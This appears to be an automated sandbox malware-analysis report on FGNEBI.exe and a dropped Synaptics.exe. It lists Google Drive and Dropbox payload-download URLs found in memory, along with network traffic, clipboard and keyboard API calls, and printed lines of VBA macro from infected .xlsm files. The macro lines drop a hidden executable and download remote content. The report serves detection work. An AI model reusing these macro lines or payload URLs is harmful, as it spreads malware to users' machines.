Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1%
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
Source: Synaptics.exe, 00000003.00000002.1628301207.000000000612E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXA
Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1W
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: ~$cache1.3.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.goopF
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/%
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#&j
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.br
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
Source: Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC~
Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMy
Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_ygnnx
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
Source: Synaptics.exe, 00000003.00000003.1514607067.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado:
Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoK
Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: ~$cache1.3.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: ~$cache1.3.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
Source: ~$cache1.3.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49724 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

2_2_00DE7099

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00DE7294
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		10_2_00237294

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

2_2_00DE7099

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

2_2_00DD4342

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00DFF5D0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		10_2_0024F5D0

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: JUIlYPbf.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: GAOBCVIQIJ.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: JUIlYPbf.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: GAOBCVIQIJ.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: JUIlYPbf.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: GAOBCVIQIJ.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: JUIlYPbf.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: GAOBCVIQIJ.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00D929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	2_2_00D929C2
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00E002AA NtdllDialogWndProc_W,	2_2_00E002AA
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFE769 NtdllDialogWndProc_W,CallWindowProcW,	2_2_00DFE769
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	2_2_00DFEAA6
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFEA4E NtdllDialogWndProc_W,	2_2_00DFEA4E
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAAC99 NtdllDialogWndProc_W,	2_2_00DAAC99
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	2_2_00DFECBC
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAAD5C NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,	2_2_00DAAD5C
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAAFB4 GetParent,NtdllDialogWndProc_W,	2_2_00DAAFB4
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	2_2_00DFEFA8
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF0A1 SendMessageW,NtdllDialogWndProc_W,	2_2_00DFF0A1
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	2_2_00DFF122
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF3DA NtdllDialogWndProc_W,	2_2_00DFF3DA
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF3AB NtdllDialogWndProc_W,	2_2_00DFF3AB
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF37C NtdllDialogWndProc_W,	2_2_00DFF37C
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF45A ClientToScreen,NtdllDialogWndProc_W,	2_2_00DFF45A
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF425 NtdllDialogWndProc_W,	2_2_00DFF425
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_00DFF5D0
